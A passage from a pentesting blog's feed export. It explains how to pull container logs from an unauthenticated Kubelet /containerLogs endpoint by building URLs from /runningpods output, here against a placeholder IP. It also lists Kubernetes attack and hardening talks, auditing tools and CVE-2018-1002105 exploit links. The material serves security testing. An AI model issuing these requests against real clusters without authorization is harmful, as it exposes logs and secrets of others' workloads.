containerLogs endpoint"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EHow to get the info that kube-hunter reports for open \/containerLogs endpoint\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003EVulnerabilities\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------+-------------+------------------+----------------------+----------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| LOCATION\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;CATEGORY\u0026nbsp; \u0026nbsp; \u0026nbsp;| VULNERABILITY\u0026nbsp; \u0026nbsp; | DESCRIPTION\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | EVIDENCE\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------+-------------+------------------+----------------------+----------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+----------------+------------+------------------+----------------------+----------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| 1.2.3.4:10250 | Information | Exposed Container| Output logs from a\u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Disclosure\u0026nbsp; | Logs\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| running container\u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | are using the\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | exposed\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | \/containerLogs\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | endpoint\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------+-------------+------------------+----------------------+----------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EFirst step, grab the output from \/runningpods\/ example below:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-NLqVo_PQIiY\/XC2pu4N0doI\/AAAAAAAACYI\/QRbxWaYtDWY3l_rSPIbwuuZJwCLzNiVWQCLcBGAs\/s1600\/runningpods.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"483\" data-original-width=\"1600\" height=\"192\" src=\"https:\/\/1.bp.blogspot.com\/-NLqVo_PQIiY\/XC2pu4N0doI\/AAAAAAAACYI\/QRbxWaYtDWY3l_rSPIbwuuZJwCLzNiVWQCLcBGAs\/s640\/runningpods.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EYou'll need the \u003Ci\u003Enamespace\u003C\/i\u003E, \u003Ci\u003Epod name \u003C\/i\u003Eand \u003Ci\u003Econtainer name\u003C\/i\u003E.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EThus given the below runningpods output:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cpre style=\"overflow-wrap: break-word; white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E{\"metadata\":{\"name\":\"\u003Cb\u003Emonitoring-influxdb-grafana-v4-6679c46745-zhvjw\u003C\/b\u003E\",\"namespace\":\"\u003Cb\u003Ekube-system\u003C\/b\u003E\",\"uid\":\"0d22cdad-06e5-11e9-a7f3-6ac885fbc092\",\"creationTimestamp\":null},\"spec\":{\"containers\":[{\"name\":\"\u003Cb\u003Egrafana\u003C\/b\u003E\",\"image\":\"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7\",\"resources\":{}},{\"name\":\"\u003Cb\u003Einfluxdb\u003C\/b\u003E\",\"image\":\"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c\",\"resources\":{}}]},\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word; white-space: pre-wrap;\"\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word; white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\n\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word; white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: Times, Times New Roman, serif;\"\u003Eturns into:\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word; white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\n\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word; white-space: pre-wrap;\"\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word;\"\u003E\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ehttps:\/\/1.2.3.4:10250\/containerLogs\/kube-system\/monitoring-influxdb-grafana-v4-6679c46745-zhvjw\/grafana\u003C\/span\u003E\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word;\"\u003E\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\n\u003C\/span\u003E\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-VUQOeki3Qrs\/XC2rMEuQ-oI\/AAAAAAAACYU\/j5KWbrVNG2sB1ZybKiXLSvMUC0iGWqy2QCLcBGAs\/s1600\/grafana.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"580\" data-original-width=\"1600\" height=\"232\" src=\"https:\/\/1.bp.blogspot.com\/-VUQOeki3Qrs\/XC2rMEuQ-oI\/AAAAAAAACYU\/j5KWbrVNG2sB1ZybKiXLSvMUC0iGWqy2QCLcBGAs\/s640\/grafana.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cpre style=\"overflow-wrap: break-word;\"\u003E\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\n\u003C\/span\u003E\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word;\"\u003E\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: Times, Times New Roman, serif;\"\u003Eand\u003C\/span\u003E\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word;\"\u003E\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\n\u003C\/span\u003E\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cspan style=\"white-space: pre-wrap;\"\u003Ehttps:\/\/1.2.3.4:10250\/containerLogs\/kube-system\/monitoring-influxdb-grafana-v4-6679c46745-zhvjw\/influxdb\u003C\/span\u003E\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cpre style=\"overflow-wrap: break-word;\"\u003E\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\n\u003C\/span\u003E\u003C\/span\u003E\u003C\/pre\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-FaU5SXAp-So\/XC2rMZBxU7I\/AAAAAAAACYY\/nSYxWyUKaZcv3ADg1u_C4K1UO169_oewgCEwYBhgL\/s1600\/influxdb.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"842\" data-original-width=\"1600\" height=\"336\" src=\"https:\/\/2.bp.blogspot.com\/-FaU5SXAp-So\/XC2rMZBxU7I\/AAAAAAAACYY\/nSYxWyUKaZcv3ADg1u_C4K1UO169_oewgCEwYBhgL\/s640\/influxdb.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/414728220328607858\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=414728220328607858","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/414728220328607858"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/414728220328607858"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/01\/kubernetes-kubelet-api-containerlogs.html","title":"Kubernetes: Kubelet API containerLogs endpoint"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/1.bp.blogspot.com\/-NLqVo_PQIiY\/XC2pu4N0doI\/AAAAAAAACYI\/QRbxWaYtDWY3l_rSPIbwuuZJwCLzNiVWQCLcBGAs\/s72-c\/runningpods.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-8583103712815741635"},"published":{"$t":"2019-01-07T09:00:00.000-05:00"},"updated":{"$t":"2019-07-21T12:57:27.212-04:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"cloud"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"hacking"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Kubernetes"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Kubernetes: Master Post"},"content":{"type":"html","$t":"\u003Cspan style=\"font-family: inherit;\"\u003EI have a few\u0026nbsp;Kubernetes posts queued up and will make this the master post to index and give references for the topic. If i'm missing blog posts or useful resources ping me here or twitter.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003ETalks you should watch if you are interested in\u0026nbsp;Kubernetes:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv style=\"background: rgb(255, 255, 255); border: 0px; color: var(--ytd-video-primary-info-renderer-title-color, var(--yt-spec-text-primary)); line-height: 2.4rem; margin: 0px; max-height: 4.8rem; overflow: hidden; padding: 0px; text-shadow: var(--ytd-video-primary-info-renderer-title-text-shadow, none); transform: var(--ytd-video-primary-info-renderer-title-transform, none);\"\u003E\n\u003Cyt-formatted-string class=\"style-scope ytd-video-primary-info-renderer\" style=\"--yt-endpoint-color: hsl(206.1, 79.3%, 52.7%);\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cb\u003EHacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman\u003C\/b\u003E\u003C\/span\u003E\u003C\/yt-formatted-string\u003E\u003C\/div\u003E\n\u003Ca href=\"https:\/\/www.youtube.com\/watch?v=vTgQLzeBfRU\" target=\"_blank\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003Ehttps:\/\/www.youtube.com\/watch?v=vTgQLzeBfRU\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/bgeesaman\/\" target=\"_blank\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003Ehttps:\/\/github.com\/bgeesaman\/\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Ca href=\"https:\/\/github.com\/bgeesaman\/hhkbe\" target=\"_blank\"\u003Ehttps:\/\/github.com\/bgeesaman\/hhkbe\u003C\/a\u003E [demos for the talk above]\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Ca href=\"https:\/\/schd.ws\/hosted_files\/kccncna17\/d8\/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf\" target=\"_blank\"\u003Ehttps:\/\/schd.ws\/hosted_files\/kccncna17\/d8\/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf\u003C\/a\u003E [slide deck]\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv style=\"background: rgb(255, 255, 255); border: 0px; color: var(--ytd-video-primary-info-renderer-title-color, var(--yt-spec-text-primary)); line-height: 2.4rem; margin: 0px; max-height: 4.8rem; overflow: hidden; padding: 0px; text-shadow: var(--ytd-video-primary-info-renderer-title-text-shadow, none); transform: var(--ytd-video-primary-info-renderer-title-transform, none);\"\u003E\n\u003Cyt-formatted-string class=\"style-scope ytd-video-primary-info-renderer\" style=\"--yt-endpoint-color: hsl(206.1, 79.3%, 52.7%);\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cb\u003EPerfect Storm Taking the Helm of Kubernetes Ian Coldwater\u003C\/b\u003E\u003C\/span\u003E\u003C\/yt-formatted-string\u003E\u003C\/div\u003E\n\u003Ca href=\"https:\/\/www.youtube.com\/watch?v=1k-GIDXgfLw\" target=\"_blank\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003Ehttps:\/\/www.youtube.com\/watch?v=1k-GIDXgfLw\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv style=\"background: rgb(255 , 255 , 255); border: 0px; display: block; font-style: normal; letter-spacing: normal; line-height: 2.4rem; margin: 0px; max-height: 4.8rem; overflow: hidden; padding: 0px; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;\"\u003E\n\u003Cyt-formatted-string class=\"style-scope ytd-video-primary-info-renderer\" style=\"--yt-endpoint-color: hsl(206.1, 79.3%, 52.7%);\"\u003E\u003Cspan style=\"font-family: inherit; font-size: small;\"\u003E\u003Cb\u003EA Hacker's Guide to Kubernetes and the Cloud - Rory McCune\u003C\/b\u003E\u003C\/span\u003E\u003C\/yt-formatted-string\u003E\u003C\/div\u003E\n\u003Cdiv style=\"background: rgb(255 , 255 , 255); border: 0px; display: block; font-style: normal; letter-spacing: normal; line-height: 2.4rem; margin: 0px; max-height: 4.8rem; overflow: hidden; padding: 0px; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;\"\u003E\n\u003Ca href=\"https:\/\/www.youtube.com\/watch?v=dxKpCO2dAy8\" target=\"_blank\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003Ehttps:\/\/www.youtube.com\/watch?v=dxKpCO2dAy8\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv style=\"background: rgb(255 , 255 , 255); border: 0px; display: block; font-style: normal; letter-spacing: normal; line-height: 2.4rem; margin: 0px; max-height: 4.8rem; overflow: hidden; padding: 0px; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;\"\u003E\n\u003Cyt-formatted-string class=\"style-scope ytd-video-primary-info-renderer\" style=\"--yt-endpoint-color: hsl(206.1, 79.3%, 52.7%);\"\u003E\u003Cspan style=\"font-family: inherit; font-size: small;\"\u003E\u003Cb\u003EShipping in Pirate-Infested Waters: Practical Attack and Defense in Kubernetes\u003C\/b\u003E\u003C\/span\u003E\u003C\/yt-formatted-string\u003E\u003C\/div\u003E\n\u003Ca href=\"https:\/\/www.youtube.com\/watch?v=ohTq0no0ZVU\" target=\"_blank\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003Ehttps:\/\/www.youtube.com\/watch?v=ohTq0no0ZVU\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nBlog posts by others:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/techbeacon.com\/hackers-guide-kubernetes-security\" target=\"_blank\"\u003Ehttps:\/\/techbeacon.com\/hackers-guide-kubernetes-security\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/elweb.co\/the-security-footgun-in-etcd\/\" target=\"_blank\"\u003Ehttps:\/\/elweb.co\/the-security-footgun-in-etcd\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.4armed.com\/blog\/hacking-kubelet-on-gke\/\" target=\"_blank\"\u003Ehttps:\/\/www.4armed.com\/blog\/hacking-kubelet-on-gke\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.4armed.com\/blog\/kubeletmein-kubelet-hacking-tool\/\" target=\"_blank\"\u003Ehttps:\/\/www.4armed.com\/blog\/kubeletmein-kubelet-hacking-tool\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.4armed.com\/blog\/hacking-digitalocean-kubernetes\/\" target=\"_blank\"\u003Ehttps:\/\/www.4armed.com\/blog\/hacking-digitalocean-kubernetes\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/freach\/kubernetes-security-best-practice\" target=\"_blank\"\u003Ehttps:\/\/github.com\/freach\/kubernetes-security-best-practice\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/neuvector.com\/container-security\/kubernetes-security-guide\/\" target=\"_blank\"\u003Ehttps:\/\/neuvector.com\/container-security\/kubernetes-security-guide\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/medium.com\/@pczarkowski\/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066\" target=\"_blank\"\u003Ehttps:\/\/medium.com\/@pczarkowski\/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/blog.intothesymmetry.com\/2018\/12\/persistent-xsrf-on-kubernetes-dashboard.html\" target=\"_blank\"\u003Ehttps:\/\/blog.intothesymmetry.com\/2018\/12\/persistent-xsrf-on-kubernetes-dashboard.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/raesene.github.io\/blog\/2016\/10\/14\/Kubernetes-Attack-Surface-cAdvisor\/\" target=\"_blank\"\u003Ehttps:\/\/raesene.github.io\/blog\/2016\/10\/14\/Kubernetes-Attack-Surface-cAdvisor\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/raesene.github.io\/blog\/2017\/05\/01\/Kubernetes-Security-etcd\/\" target=\"_blank\"\u003Ehttps:\/\/raesene.github.io\/blog\/2017\/05\/01\/Kubernetes-Security-etcd\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/raesene.github.io\/blog\/2017\/04\/02\/Kubernetes-Service-Tokens\/\" target=\"_blank\"\u003Ehttps:\/\/raesene.github.io\/blog\/2017\/04\/02\/Kubernetes-Service-Tokens\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.cyberark.com\/threat-research-blog\/securing-kubernetes-clusters-by-eliminating-risky-permissions\/\" target=\"_blank\"\u003Ehttps:\/\/www.cyberark.com\/threat-research-blog\/securing-kubernetes-clusters-by-eliminating-risky-permissions\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/labs.mwrinfosecurity.com\/blog\/attacking-kubernetes-through-kubelet\/\" target=\"_blank\"\u003Ehttps:\/\/labs.mwrinfosecurity.com\/blog\/attacking-kubernetes-through-kubelet\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/blog.ropnop.com\/attacking-default-installs-of-helm-on-kubernetes\/\" target=\"_blank\"\u003Ehttps:\/\/blog.ropnop.com\/attacking-default-installs-of-helm-on-kubernetes\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nAuditing tools\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/Shopify\/kubeaudit\" target=\"_blank\"\u003Ehttps:\/\/github.com\/Shopify\/kubeaudit\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/aquasecurity\/kube-bench\" target=\"_blank\"\u003Ehttps:\/\/github.com\/aquasecurity\/kube-bench\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/aquasecurity\/kube-hunter\" target=\"_blank\"\u003Ehttps:\/\/github.com\/aquasecurity\/kube-hunter\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nCVE-2018-1002105 resources\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/blog.appsecco.com\/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb\" target=\"_blank\"\u003Ehttps:\/\/blog.appsecco.com\/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/gravitational.com\/blog\/kubernetes-websocket-upgrade-security-vulnerability\/\" target=\"_blank\"\u003Ehttps:\/\/gravitational.com\/blog\/kubernetes-websocket-upgrade-security-vulnerability\/\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/gravitational\/cve-2018-1002105\" target=\"_blank\"\u003Ehttps:\/\/github.com\/gravitational\/cve-2018-1002105\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/evict\/poc_CVE-2018-1002105\" target=\"_blank\"\u003Ehttps:\/\/github.com\/evict\/poc_CVE-2018-1002105\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nCG Posts:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nOpen Etcd:\u0026nbsp;\u003Ca href=\"http:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-open-etcd.html\" target=\"_blank\"\u003Ehttp:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-open-etcd.html\u003C\/a\u003E\u003Cbr 